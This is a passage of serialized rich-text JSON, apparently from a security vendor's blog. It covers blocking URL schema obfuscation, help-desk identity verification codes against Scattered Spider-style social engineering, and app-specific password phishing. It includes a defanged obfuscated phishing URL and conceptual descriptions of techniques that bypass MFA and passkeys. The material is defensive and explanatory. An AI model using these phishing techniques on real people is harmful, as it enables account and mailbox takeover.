hxxps:\u002F\u002Fgoogle.com",{"data":36233,"marks":36234,"value":36236,"nodeType":883},{},[36235],{"type":916},"@",{"data":36238,"marks":36239,"value":36242,"nodeType":883},{},[36240,36241],{"type":916},{"type":948},"phishing.com",{"data":36244,"marks":36245,"value":36246,"nodeType":883},{},[],". The destination page is then often further obfuscated through encoding to further disguise the malicious link. ",{"data":36248,"content":36249,"nodeType":879},{},[36250],{"data":36251,"marks":36252,"value":36253,"nodeType":883},{},[],"URL schema obfuscation has two main benefits for an attacker:",{"data":36255,"content":36256,"nodeType":1531},{},[36257,36267],{"data":36258,"content":36259,"nodeType":1535},{},[36260],{"data":36261,"content":36262,"nodeType":879},{},[36263],{"data":36264,"marks":36265,"value":36266,"nodeType":883},{},[],"It increases the likelihood that a victim clicks a link by appearing legitimate at a glance.",{"data":36268,"content":36269,"nodeType":1535},{},[36270],{"data":36271,"content":36272,"nodeType":879},{},[36273],{"data":36274,"marks":36275,"value":36276,"nodeType":883},{},[],"Common URL parsing logic often fails when encountering this technique. This means that where a network defense tool is relying on knowing the server\u002Fpage a URL is pointing to (e.g. checking if a domain is on a threat intel feed), it could potentially bypass it.",{"data":36278,"content":36279,"nodeType":879},{},[36280,36284,36292],{"data":36281,"marks":36282,"value":36283,"nodeType":883},{},[],"VirusTotal shows abuse of this technique dating back to at least February 2022, and we’re still encountering it in the wild today. After seeing an uptick in URL obfuscation pages being intercepted by ",{"data":36285,"content":36286,"nodeType":940},{"uri":36015},[36287],{"data":36288,"marks":36289,"value":36291,"nodeType":883},{},[36290],{"type":948},"Push’s other browser-based phishing protection controls",{"data":36293,"marks":36294,"value":36295,"nodeType":883},{},[],", we decided to use our position in the browser to roll out an additional layer of protection against this technique. ",{"data":36297,"content":36298,"nodeType":905},{},[],{"data":36300,"content":36301,"nodeType":909},{},[36302],{"data":36303,"marks":36304,"value":36306,"nodeType":883},{},[36305],{"type":916},"Block URL obfuscation in the browser",{"data":36308,"content":36309,"nodeType":879},{},[36310],{"data":36311,"marks":36312,"value":36313,"nodeType":883},{},[],"We’re providing Push customers with the ability to outright block schema obfuscation when it’s encountered in the browser, protecting against attackers using this technique to obfuscate their phishing and malware delivery pages\u002Fservers. ",{"data":36315,"content":36316,"nodeType":879},{},[36317],{"data":36318,"marks":36319,"value":36320,"nodeType":883},{},[],"No matter where the link originates, Push intercepts it at the point of execution in the browser, and shuts the attack down. ",{"data":36322,"content":36323,"nodeType":879},{},[36324],{"data":36325,"marks":36326,"value":36327,"nodeType":883},{},[],"Here’s how it works:",{"data":36329,"content":36333,"nodeType":971},{"target":36330},{"sys":36331},{"id":36332,"type":976,"linkType":977},"35dUsivrKA5tNINGmaNfdb",[],{"data":36335,"content":36336,"nodeType":879},{},[36337],{"data":36338,"marks":36339,"value":36340,"nodeType":883},{},[],"To enable the control, simply hit the toggle under “URL blocking” from the Push dashboard. ",{"data":36342,"content":36346,"nodeType":971},{"target":36343},{"sys":36344},{"id":36345,"type":976,"linkType":977},"A6Zz23b8mIdAaQnl99lQn",[],{"data":36348,"content":36349,"nodeType":905},{},[],{"data":36351,"content":36352,"nodeType":909},{},[36353],{"data":36354,"marks":36355,"value":18990,"nodeType":883},{},[36356],{"type":916},{"data":36358,"content":36359,"nodeType":879},{},[36360],{"data":36361,"marks":36362,"value":36363,"nodeType":883},{},[],"Push Security’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use, like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more.",{"data":36365,"content":36366,"nodeType":879},{},[36367,36371,36379],{"data":36368,"marks":36369,"value":36370,"nodeType":883},{},[],"If you want to learn more about how Push helps you to detect and defeat common identity attack techniques, ",{"data":36372,"content":36374,"nodeType":940},{"uri":36373},"https:\u002F\u002Fpushsecurity.com\u002Fdemo\u002F?utm_campaign=12883224-FY25Q2_Scattered-Spider&utm_source=bleepingcomputer&utm_content=sponsored-article",[36375],{"data":36376,"marks":36377,"value":1751,"nodeType":883},{},[36378],{"type":948},{"data":36380,"marks":36381,"value":1350,"nodeType":883},{},[],{"entries":36383},{"hyperlink":36384,"inline":36385,"block":36386},[],[],[36387,36390],{"sys":36388,"__typename":6000,"title":36306,"arcadeDemoUrl":36389,"playText":32050},{"id":36332},"https:\u002F\u002Fdemo.arcade.software\u002FwAgMRhKeX2heQPyUh8tK?embed",{"sys":36391,"__typename":1765,"title":36392,"caption":36393,"layoutMode":59,"file":36394},{"id":36345},"Enable URL schema obfuscation","URL obfuscation blocking can be enabled with a simple toggle. ",{"url":36395,"width":36396,"height":36397},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7ypmTNXQSaVW961uwCilOH\u002Fe2b3c04a1fb38d9adae6a1528332bafa\u002FScreenshot_2025-07-01_at_09.00.23.png",1454,398,{"items":36399},[],{},"Block URL obfuscation in the browser with Push","2025-07-01T00:00:00.000Z",{"items":36404},[36405,36766,37456],{"__typename":1967,"sys":36406,"content":36408,"title":36754,"synopsis":36755,"hashTags":59,"publishedDate":36756,"slug":36757,"tagsCollection":36758,"authorsCollection":36762},{"id":36407},"4rLP8wr6HnvBG2OzqYYKpF",{"json":36409},{"data":36410,"content":36411,"nodeType":875},{},[36412,36419,36426,36433,36439,36446,36479,36486,36493,36500,36506,36513,36520,36538,36544,36551,36571,36591,36598,36605,36612,36619,36626,36633,36640,36660,36667,36674,36680,36687,36694,36718,36724,36742,36748],{"data":36413,"content":36414,"nodeType":879},{},[36415],{"data":36416,"marks":36417,"value":36418,"nodeType":883},{},[],"Scattered Spider has shown the world the devastating effects attackers can achieve by socially engineering IT help desks into performing MFA resets so they can take over accounts on sensitive corporate apps. ",{"data":36420,"content":36421,"nodeType":879},{},[36422],{"data":36423,"marks":36424,"value":36425,"nodeType":883},{},[],"That’s why we’re introducing Employee Identity Verification Codes — a simple, browser-based identity check that gives your help desk a reliable way to confirm they’re talking to someone from your organization.",{"data":36427,"content":36428,"nodeType":879},{},[36429],{"data":36430,"marks":36431,"value":36432,"nodeType":883},{},[],"Push now provides your employees with a rotating 6-digit verification code in their browser via the Push Security extension. When an employee contacts your IT help desk to request an MFA reset or access recovery, the help desk can ask for this code to verify their identity — ensuring it’s really them, and not an attacker.",{"data":36434,"content":36438,"nodeType":971},{"target":36435},{"sys":36436},{"id":36437,"type":976,"linkType":977},"3PkiGgzwSt9Nb5rsGRiQVZ",[],{"data":36440,"content":36441,"nodeType":879},{},[36442],{"data":36443,"marks":36444,"value":36445,"nodeType":883},{},[],"The employee identity verification codes are:",{"data":36447,"content":36448,"nodeType":1531},{},[36449,36459,36469],{"data":36450,"content":36451,"nodeType":1535},{},[36452],{"data":36453,"content":36454,"nodeType":879},{},[36455],{"data":36456,"marks":36457,"value":36458,"nodeType":883},{},[],"Session-aware - generated in users’ browsers and only visible to them when they click on the Push Security extension icon in their browser toolbar.",{"data":36460,"content":36461,"nodeType":1535},{},[36462],{"data":36463,"content":36464,"nodeType":879},{},[36465],{"data":36466,"marks":36467,"value":36468,"nodeType":883},{},[],"Rotating: they change every 24 hours",{"data":36470,"content":36471,"nodeType":1535},{},[36472],{"data":36473,"content":36474,"nodeType":879},{},[36475],{"data":36476,"marks":36477,"value":36478,"nodeType":883},{},[],"Lightweight: no additional apps or devices required",{"data":36480,"content":36481,"nodeType":879},{},[36482],{"data":36483,"marks":36484,"value":36485,"nodeType":883},{},[],"It’s a fast, simple verification method — directly in the employee’s browser — that addresses a real-world threat.",{"data":36487,"content":36488,"nodeType":909},{},[36489],{"data":36490,"marks":36491,"value":36492,"nodeType":883},{},[],"We think it’s swell, but don’t just take our word for it …",{"data":36494,"content":36495,"nodeType":879},{},[36496],{"data":36497,"marks":36498,"value":36499,"nodeType":883},{},[],"Eric Rubin — a Senior Manager in GitLab’s Corporate Security team — has already rolled out Employee Identity Verification Codes across his workforce. Here’s what he had to say about it:",{"data":36501,"content":36505,"nodeType":971},{"target":36502},{"sys":36503},{"id":36504,"type":976,"linkType":977},"5ZLaA869NXpMjVwkswEyOB",[],{"data":36507,"content":36508,"nodeType":879},{},[36509],{"data":36510,"marks":36511,"value":36512,"nodeType":883},{},[],"Thank you, Eric!",{"data":36514,"content":36515,"nodeType":909},{},[36516],{"data":36517,"marks":36518,"value":36519,"nodeType":883},{},[],"Why are help desk identity verification methods so hot right now?",{"data":36521,"content":36522,"nodeType":879},{},[36523,36527,36534],{"data":36524,"marks":36525,"value":36526,"nodeType":883},{},[],"A number of the high-profile incidents attributed to the ",{"data":36528,"content":36529,"nodeType":940},{"uri":32531},[36530],{"data":36531,"marks":36532,"value":36533,"nodeType":883},{},[],"Scattered Spider cybercriminal group",{"data":36535,"marks":36536,"value":36537,"nodeType":883},{},[]," saw them socially engineer IT help desks into resetting MFA on employee accounts that they had already acquired valid credentials for. These compromised accounts were typically on IdP systems like Okta providing SSO access to large numbers of downstream applications.",{"data":36539,"content":36543,"nodeType":971},{"target":36540},{"sys":36541},{"id":36542,"type":976,"linkType":977},"2F2dpOkyXWnrKgFC3dSl67",[],{"data":36545,"content":36546,"nodeType":1036},{},[36547],{"data":36548,"marks":36549,"value":36550,"nodeType":883},{},[],"Case study: The MGM Resorts breach",{"data":36552,"content":36553,"nodeType":879},{},[36554,36558,36567],{"data":36555,"marks":36556,"value":36557,"nodeType":883},{},[],"One of Scattered Spider’s most notorious and well-documented attacks was against ",{"data":36559,"content":36561,"nodeType":940},{"uri":36560},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fidentity-attacks-in-the-wild\u002F#id-mgm-resorts-september-2023",[36562],{"data":36563,"marks":36564,"value":36566,"nodeType":883},{},[36565],{"type":948},"MGM Resorts",{"data":36568,"marks":36569,"value":36570,"nodeType":883},{},[],". Scattered Spider socially engineered MGM Resorts’ help desk personnel to bypass MFA and log in to accounts for which they had acquired valid login credentials via credential phishing and historical infostealer compromises. ",{"data":36572,"content":36573,"nodeType":879},{},[36574,36578,36587],{"data":36575,"marks":36576,"value":36577,"nodeType":883},{},[],"They specifically targeted accounts with Super Administrator privileges within MGM Resorts’ Okta tenant, which they then used to register a second, attacker-controlled IdP via ",{"data":36579,"content":36581,"nodeType":940},{"uri":36580},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Finbound_federation\u002Fdescription.md",[36582],{"data":36583,"marks":36584,"value":36586,"nodeType":883},{},[36585],{"type":948},"inbound federation",{"data":36588,"marks":36589,"value":36590,"nodeType":883},{},[],". This then enabled them to impersonate any user within the Okta tenant. ",{"data":36592,"content":36593,"nodeType":879},{},[36594],{"data":36595,"marks":36596,"value":36597,"nodeType":883},{},[],"The attackers were then able to abuse SSO access to downstream apps and platforms from various accounts, culminating in deployment of ransomware to around 100 ESXi servers and data exfiltration. ",{"data":36599,"content":36600,"nodeType":879},{},[36601],{"data":36602,"marks":36603,"value":36604,"nodeType":883},{},[],"The breach resulted in a 36-hour outage, a $100M hit to its Q3 results, one-time cyber consulting fees in the region of $10M, and a class-action lawsuit later settled for $45M. ",{"data":36606,"content":36607,"nodeType":1036},{},[36608],{"data":36609,"marks":36610,"value":36611,"nodeType":883},{},[],"Reassessing help desk verification processes",{"data":36613,"content":36614,"nodeType":879},{},[36615],{"data":36616,"marks":36617,"value":36618,"nodeType":883},{},[],"Scattered Spider’s high-profile attacks — including its most recent against UK retailers Marks & Spencer’s and the Co-op — has prompted many security teams to reassess the verification processes used by their IT help desks when an employee requests an MFA reset or access to sensitive applications. ",{"data":36620,"content":36621,"nodeType":879},{},[36622],{"data":36623,"marks":36624,"value":36625,"nodeType":883},{},[],"Initial guidance from across the industry included the use of call-back verification for any MFA or credential changes requested by an employee. However, Scattered Spider are also known to use SIM-swapping to trick mobile carriers into transferring a victim’s phone number to a SIM card controlled by the attacker - thereby allowing them to intercept verification calls. ",{"data":36627,"content":36628,"nodeType":909},{},[36629],{"data":36630,"marks":36631,"value":36632,"nodeType":883},{},[],"Simple verification using your employees’ browsers",{"data":36634,"content":36635,"nodeType":879},{},[36636],{"data":36637,"marks":36638,"value":36639,"nodeType":883},{},[],"Push already provides several controls that directly align to the other TTPs used by Scattered Spider. They include detecting stolen credentials, cloned login pages, AitM toolkits and compromised IdP sessions. ",{"data":36641,"content":36642,"nodeType":879},{},[36643,36647,36656],{"data":36644,"marks":36645,"value":36646,"nodeType":883},{},[],"(BTW, if this piques your interest, you can ",{"data":36648,"content":36650,"nodeType":940},{"uri":36649},"https:\u002F\u002Fpushsecurity.com\u002Fresources?type=webinar#content",[36651],{"data":36652,"marks":36653,"value":36655,"nodeType":883},{},[36654],{"type":948},"stream our latest webinar",{"data":36657,"marks":36658,"value":36659,"nodeType":883},{},[]," where we deep-dive into Scattered Spider, how their TTPs are evolving in 2025, and what Push is doing to protect organizations against them.) ",{"data":36661,"content":36662,"nodeType":879},{},[36663],{"data":36664,"marks":36665,"value":36666,"nodeType":883},{},[],"But to provide our customers with an additional layer of defense against the Scattered Spider attack chain, we wanted to see how we could make it harder for attackers to socially engineer IT help desks into gaining access to IdP systems and sensitive apps.",{"data":36668,"content":36669,"nodeType":879},{},[36670],{"data":36671,"marks":36672,"value":36673,"nodeType":883},{},[],"As so often is the case, the answer was staring us right in the face - we can use our browser extension. By placing a verification code in the details tray of every employees’ Push extension, they can use that to verify their identity with their help desk team.",{"data":36675,"content":36679,"nodeType":971},{"target":36676},{"sys":36677},{"id":36678,"type":976,"linkType":977},"4hRJVGqKGyOHJ8NSsQYWGP",[],{"data":36681,"content":36682,"nodeType":909},{},[36683],{"data":36684,"marks":36685,"value":36686,"nodeType":883},{},[],"Get started today!",{"data":36688,"content":36689,"nodeType":879},{},[36690],{"data":36691,"marks":36692,"value":36693,"nodeType":883},{},[],"Employee verification codes is a Labs feature, which means it’s available on an early-access basis. We're particularly interested in hearing your feedback on how to develop this feature further.",{"data":36695,"content":36696,"nodeType":879},{},[36697,36701,36705,36709,36714],{"data":36698,"marks":36699,"value":36700,"nodeType":883},{},[],"You can enable Labs features by going to the ",{"data":36702,"marks":36703,"value":26607,"nodeType":883},{},[36704],{"type":916},{"data":36706,"marks":36707,"value":36708,"nodeType":883},{},[]," page of the Push admin console and choosing the ",{"data":36710,"marks":36711,"value":36713,"nodeType":883},{},[36712],{"type":916},"Labs",{"data":36715,"marks":36716,"value":36717,"nodeType":883},{},[]," tab.",{"data":36719,"content":36723,"nodeType":971},{"target":36720},{"sys":36721},{"id":36722,"type":976,"linkType":977},"6TyqP2eOmalIF6RRoe476Y",[],{"data":36725,"content":36726,"nodeType":879},{},[36727,36731,36738],{"data":36728,"marks":36729,"value":36730,"nodeType":883},{},[],"If you’d like to find out more about this feature, and the other ways Push is stopping identity attacks in the browser, ",{"data":36732,"content":36733,"nodeType":940},{"uri":3254},[36734],{"data":36735,"marks":36736,"value":7109,"nodeType":883},{},[36737],{"type":948},{"data":36739,"marks":36740,"value":36741,"nodeType":883},{},[]," with one of our team. ",{"data":36743,"content":36747,"nodeType":971},{"target":36744},{"sys":36745},{"id":36746,"type":976,"linkType":977},"7xBE9MrnMy3hfwIkhLhNhQ",[],{"data":36749,"content":36750,"nodeType":879},{},[36751],{"data":36752,"marks":36753,"value":21,"nodeType":883},{},[],"A simple, browser-based way to protect your help desk against social engineering","Push's new Employee Identity Verification Codes feature is a simple way for your help desk to confirm they’re talking to someone from your organization.\n","2025-06-19T00:00:00.000Z","employee-identity-verification-codes-release",{"items":36759},[36760],{"sys":36761,"name":298},{"id":6696},{"items":36763},[36764],{"fullName":34966,"firstName":34967,"jobTitle":4799,"profilePicture":36765},{"url":34969},{"__typename":1967,"sys":36767,"content":36769,"title":37442,"synopsis":37443,"hashTags":59,"publishedDate":37444,"slug":37445,"tagsCollection":37446,"authorsCollection":37452},{"id":36768},"3c9KMXYa1A9rOg61Kmg7j4",{"json":36770},{"data":36771,"content":36772,"nodeType":875},{},[36773,36816,36823,36830,36862,36869,36872,36880,36900,36906,36913,36920,36927,36930,36938,36945,36965,36972,36978,36981,36989,36996,37064,37071,37074,37082,37089,37096,37208,37215,37218,37225,37255,37262,37265,37273,37280,37300,37307,37310,37317,37324,37330,37337,37343,37350,37393,37400,37407,37410,37418,37425],{"data":36774,"content":36775,"nodeType":879},{},[36776,36780,36788,36791,36800,36803,36812],{"data":36777,"marks":36778,"value":36779,"nodeType":883},{},[],"App-Specific Passwords (ASPs) are a way for users to access applications that do not support MFA or are otherwise incompatible with a platform’s standard login workflows. They are intended to enable a user to login to “legacy” (typically desktop) applications that do not support modern authentication (e.g. OAuth 2.0). For example, you might use this feature to allow a third-party mail client access to an email account by logging in with your ",{"data":36781,"content":36783,"nodeType":940},{"uri":36782},"https:\u002F\u002Fsupport.microsoft.com\u002Fen-gb\u002Faccount-billing\u002Fhow-to-get-and-use-app-passwords-5896ed9b-4263-e681-128a-a6f2979a7944",[36784],{"data":36785,"marks":36786,"value":13539,"nodeType":883},{},[36787],{"type":948},{"data":36789,"marks":36790,"value":2524,"nodeType":883},{},[],{"data":36792,"content":36794,"nodeType":940},{"uri":36793},"https:\u002F\u002Fsupport.google.com\u002Faccounts\u002Fanswer\u002F185833?hl=en",[36795],{"data":36796,"marks":36797,"value":36799,"nodeType":883},{},[36798],{"type":948},"Google",{"data":36801,"marks":36802,"value":10244,"nodeType":883},{},[],{"data":36804,"content":36806,"nodeType":940},{"uri":36805},"https:\u002F\u002Fsupport.apple.com\u002Fen-us\u002F102654",[36807],{"data":36808,"marks":36809,"value":36811,"nodeType":883},{},[36810],{"type":948},"Apple",{"data":36813,"marks":36814,"value":36815,"nodeType":883},{},[]," account. ",{"data":36817,"content":36818,"nodeType":879},{},[36819],{"data":36820,"marks":36821,"value":36822,"nodeType":883},{},[],"The logic behind this is that it is comparatively more secure than giving your critical IdP password to less secure apps — likely due to the volume of accounts compromised as a result of third-party breaches. It also means that if someone phishes your primary account password that normally has a second factor, that specific password can’t be used without the second factor. ",{"data":36824,"content":36825,"nodeType":879},{},[36826],{"data":36827,"marks":36828,"value":36829,"nodeType":883},{},[],"However, if an ASP is acquired by an attacker, it can be used to login to the target app — circumventing phishing-resistant authentication methods such as passkeys, and bypassing MFA checks. It effectively provides a method of sidestepping your preferred login method. So for example, if you're an organization that uses a passwordless login to access your Google Workspace account and has disabled secondary login methods (the gold standard in terms of secure authentication), an ASP gives attackers a way around this. ",{"data":36831,"content":36832,"nodeType":879},{},[36833,36837,36846,36850,36858],{"data":36834,"marks":36835,"value":36836,"nodeType":883},{},[],"With recent evidence of exploitation in the wild in the form of ",{"data":36838,"content":36840,"nodeType":940},{"uri":36839},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fapp_specific_password_phishing\u002Fdescription.md",[36841],{"data":36842,"marks":36843,"value":36845,"nodeType":883},{},[36844],{"type":948},"app-specific password phishing",{"data":36847,"marks":36848,"value":36849,"nodeType":883},{},[],", our latest addition to the ",{"data":36851,"content":36852,"nodeType":940},{"uri":7799},[36853],{"data":36854,"marks":36855,"value":36857,"nodeType":883},{},[36856],{"type":948},"SaaS attacks matrix",{"data":36859,"marks":36860,"value":36861,"nodeType":883},{},[],", it’s important that security teams are aware of this technique, what the risks are, and how to defend against it.  ",{"data":36863,"content":36864,"nodeType":879},{},[36865],{"data":36866,"marks":36867,"value":36868,"nodeType":883},{},[],"Let’s take a quick look at how this actually works before we dive into the malicious use cases. ",{"data":36870,"content":36871,"nodeType":905},{},[],{"data":36873,"content":36874,"nodeType":909},{},[36875],{"data":36876,"marks":36877,"value":36879,"nodeType":883},{},[36878],{"type":916},"ASPs 101",{"data":36881,"content":36882,"nodeType":879},{},[36883,36887,36896],{"data":36884,"marks":36885,"value":36886,"nodeType":883},{},[],"ASPs are pretty straightforward. You log into your chosen account (e.g. Microsoft, Google, or Apple) and navigate to the ASP creation page — in Google’s case ",{"data":36888,"content":36890,"nodeType":940},{"uri":36889},"http:\u002F\u002Fmyaccount.google.com\u002Fapppasswords",[36891],{"data":36892,"marks":36893,"value":36895,"nodeType":883},{},[36894],{"type":948},"myaccount.google.com\u002Fapppasswords",{"data":36897,"marks":36898,"value":36899,"nodeType":883},{},[],". Then, it’s as simple as typing in a name and hitting the “create” button. ",{"data":36901,"content":36905,"nodeType":971},{"target":36902},{"sys":36903},{"id":36904,"type":976,"linkType":977},"76qanYHiwrSyrkwlYnCuCZ",[],{"data":36907,"content":36908,"nodeType":879},{},[36909],{"data":36910,"marks":36911,"value":36912,"nodeType":883},{},[],"This isn’t actually app-specific in the sense that it’s tied to a specific app at the point of creation, but the idea is that you’d create a unique password for each app you want to log into. ",{"data":36914,"content":36915,"nodeType":879},{},[36916],{"data":36917,"marks":36918,"value":36919,"nodeType":883},{},[],"From this point, you can use the password along with your email address to log into apps normally. It’s important to note that this isn’t available for every app, but is specifically intended for things like third-party email clients. By logging in with an ASP, you are also granting specific permissions to the app. So in the case of Google, you can view, send and delete emails, access contacts, and access the calendar, but you can’t add mail rules, or access other G-Suite apps like Google Drive.   ",{"data":36921,"content":36922,"nodeType":879},{},[36923],{"data":36924,"marks":36925,"value":36926,"nodeType":883},{},[],"It’s important to note that you can’t use this as a substitute for SSO — e.g. you can’t authenticate to a third-party app like Slack using your Google account with an ASP, so the risk is somewhat limited to basic email functionality. That said, email access gives an attacker plenty to work with, and it’s enough to move laterally to other accounts through password and MFA resets — so there’s plenty of scope to expand the blast radius with a little extra legwork.  ",{"data":36928,"content":36929,"nodeType":905},{},[],{"data":36931,"content":36932,"nodeType":909},{},[36933],{"data":36934,"marks":36935,"value":36937,"nodeType":883},{},[36936],{"type":916},"How ASP phishing works",{"data":36939,"content":36940,"nodeType":879},{},[36941],{"data":36942,"marks":36943,"value":36944,"nodeType":883},{},[],"While logging in with an ASP doesn’t grant an attacker full access to the account, there’s still a lot that an attacker can do with access to email, contact, and calendar information. It’s certainly enough to be used in social engineering attacks impersonating the compromised user, as well as generally monitoring email activity. ",{"data":36946,"content":36947,"nodeType":879},{},[36948,36952,36961],{"data":36949,"marks":36950,"value":36951,"nodeType":883},{},[],"An ",{"data":36953,"content":36955,"nodeType":940},{"uri":36954},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fcreative-phishing-academics-critics-of-russia",[36956],{"data":36957,"marks":36958,"value":36960,"nodeType":883},{},[36959],{"type":948},"example of this was recently disclosed",{"data":36962,"marks":36963,"value":36964,"nodeType":883},{},[]," where an expert on Russian information operations was targeted with a sophisticated and personalized social engineering attack, where the attacker was able to establish persistent access to the victim’s mailbox using ASPs by logging into a mail client. ",{"data":36966,"content":36967,"nodeType":879},{},[36968],{"data":36969,"marks":36970,"value":36971,"nodeType":883},{},[],"This involved a sophisticated lure impersonating the US Department of State instructing the victim on how to create and share an ASP with the attacker, granting access to their Google mailbox. ",{"data":36973,"content":36977,"nodeType":971},{"target":36974},{"sys":36975},{"id":36976,"type":976,"linkType":977},"Lt93bzQNcEzg2OoCSrgED",[],{"data":36979,"content":36980,"nodeType":905},{},[],{"data":36982,"content":36983,"nodeType":909},{},[36984],{"data":36985,"marks":36986,"value":36988,"nodeType":883},{},[36987],{"type":916},"Benefits and limitations of ASP phishing",{"data":36990,"content":36991,"nodeType":879},{},[36992],{"data":36993,"marks":36994,"value":36995,"nodeType":883},{},[],"This approach has a few advantages over conventional credential phishing:",{"data":36997,"content":36998,"nodeType":1531},{},[36999,37009,37019,37029],{"data":37000,"content":37001,"nodeType":1535},{},[37002],{"data":37003,"content":37004,"nodeType":879},{},[37005],{"data":37006,"marks":37007,"value":37008,"nodeType":883},{},[],"It completely sidesteps otherwise phishing-resistant login methods such as passkeys, and by design does not require MFA. ",{"data":37010,"content":37011,"nodeType":1535},{},[37012],{"data":37013,"content":37014,"nodeType":879},{},[37015],{"data":37016,"marks":37017,"value":37018,"nodeType":883},{},[],"This kind of attack also naturally doesn’t trigger many typical phishing or malware-based detections. As it’s pure social engineering, there is no malicious link, page, or file to analyse. ",{"data":37020,"content":37021,"nodeType":1535},{},[37022],{"data":37023,"content":37024,"nodeType":879},{},[37025],{"data":37026,"marks":37027,"value":37028,"nodeType":883},{},[],"For less technically aware victims, this might present a more effective alternative to traditional credential phishing — awareness training won’t extend to this kind of use case. ",{"data":37030,"content":37031,"nodeType":1535},{},[37032],{"data":37033,"content":37034,"nodeType":879},{},[37035,37039,37048,37052,37061],{"data":37036,"marks":37037,"value":37038,"nodeType":883},{},[],"While generic security alert emails are generated when an app password is created, visibility of actual login events is limited. For example, ",{"data":37040,"content":37042,"nodeType":940},{"uri":37041},"https:\u002F\u002Fissuetracker.google.com\u002Fissues\u002F298128558",[37043],{"data":37044,"marks":37045,"value":37047,"nodeType":883},{},[37046],{"type":948},"Google provides no logs for ASP creation and usage",{"data":37049,"marks":37050,"value":37051,"nodeType":883},{},[],", while ",{"data":37053,"content":37055,"nodeType":940},{"uri":37054},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fentra\u002Fidentity\u002Fauthentication\u002Fhowto-mfa-app-passwords",[37056],{"data":37057,"marks":37058,"value":37060,"nodeType":883},{},[37059],{"type":948},"Microsoft provides no on-premises logging or auditing capability",{"data":37062,"marks":37063,"value":34940,"nodeType":883},{},[],{"data":37065,"content":37066,"nodeType":879},{},[37067],{"data":37068,"marks":37069,"value":37070,"nodeType":883},{},[],"However, there are also limitations that will probably see this technique remain a niche choice for attackers. Namely, the complexity of the attack doesn’t necessarily map to the payoff, where it doesn’t result in full account compromise and the permissions\u002Fscopes of an ASP login are limited. This means that it lends itself to multi-step attacks, most likely as part of more targeted and stealthy attacks against specific individuals (as seen in the example above). For this reason, attackers are likely to prioritize other methods when they are available. ",{"data":37072,"content":37073,"nodeType":905},{},[],{"data":37075,"content":37076,"nodeType":909},{},[37077],{"data":37078,"marks":37079,"value":37081,"nodeType":883},{},[37080],{"type":916},"Comparing ASPs with other auth bypasses",{"data":37083,"content":37084,"nodeType":879},{},[37085],{"data":37086,"marks":37087,"value":37088,"nodeType":883},{},[],"ASP phishing is part of a growing trend of phishing techniques focused on bypassing conventional authentication. With more organizations investing in phishing-resistant authentication methods like passkeys\u002FWebAuthn and using SSO as standard, attackers are increasingly looking to circumvent the standard login process entirely. ",{"data":37090,"content":37091,"nodeType":879},{},[37092],{"data":37093,"marks":37094,"value":37095,"nodeType":883},{},[],"Similar phishing approaches designed to circumvent an account’s authentication controls include:",{"data":37097,"content":37098,"nodeType":1531},{},[37099,37122,37154,37174],{"data":37100,"content":37101,"nodeType":1535},{},[37102],{"data":37103,"content":37104,"nodeType":879},{},[37105,37109,37118],{"data":37106,"marks":37107,"value":37108,"nodeType":883},{},[],"Phishing for ",{"data":37110,"content":37112,"nodeType":940},{"uri":37111},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fapi_keys\u002Fdescription.md",[37113],{"data":37114,"marks":37115,"value":37117,"nodeType":883},{},[37116],{"type":948},"API keys",{"data":37119,"marks":37120,"value":37121,"nodeType":883},{},[],", which has the advantage of granting full access to the account, and persisting even if the account password is changed (in contrast, Google resets all ASPs if the account password is changed). ",{"data":37123,"content":37124,"nodeType":1535},{},[37125],{"data":37126,"content":37127,"nodeType":879},{},[37128,37131,37138,37142,37150],{"data":37129,"marks":37130,"value":21,"nodeType":883},{},[],{"data":37132,"content":37133,"nodeType":940},{"uri":29583},[37134],{"data":37135,"marks":37136,"value":703,"nodeType":883},{},[37137],{"type":948},{"data":37139,"marks":37140,"value":37141,"nodeType":883},{},[],", which sees the victim accept OAuth scopes for an attacker-controlled app integration granting access to the account without needing to directly compromise it. (",{"data":37143,"content":37144,"nodeType":940},{"uri":3454},[37145],{"data":37146,"marks":37147,"value":37149,"nodeType":883},{},[37148],{"type":948},"You can read more about recent examples here",{"data":37151,"marks":37152,"value":37153,"nodeType":883},{},[],".) ",{"data":37155,"content":37156,"nodeType":1535},{},[37157],{"data":37158,"content":37159,"nodeType":879},{},[37160,37163,37170],{"data":37161,"marks":37162,"value":21,"nodeType":883},{},[],{"data":37164,"content":37165,"nodeType":940},{"uri":13350},[37166],{"data":37167,"marks":37168,"value":361,"nodeType":883},{},[37169],{"type":948},{"data":37171,"marks":37172,"value":37173,"nodeType":883},{},[],", functionally very similar to consent phishing but involving the victim entering a code for authorization. ",{"data":37175,"content":37176,"nodeType":1535},{},[37177],{"data":37178,"content":37179,"nodeType":879},{},[37180,37183,37192,37196,37205],{"data":37181,"marks":37182,"value":21,"nodeType":883},{},[],{"data":37184,"content":37186,"nodeType":940},{"uri":37185},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fcross-idp_impersonation\u002Fdescription.md",[37187],{"data":37188,"marks":37189,"value":37191,"nodeType":883},{},[37190],{"type":948},"Cross-IdP impersonation",{"data":37193,"marks":37194,"value":37195,"nodeType":883},{},[],", which sees the attacker register a new IdP connected to the victim’s email account that can be used to access connected apps via SSO without directly compromising the primary IdP. (",{"data":37197,"content":37199,"nodeType":940},{"uri":37198},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fa-new-class-of-phishing-verification-phishing-and-cross-idp-impersonation\u002F",[37200],{"data":37201,"marks":37202,"value":37204,"nodeType":883},{},[37203],{"type":948},"You can read more about this 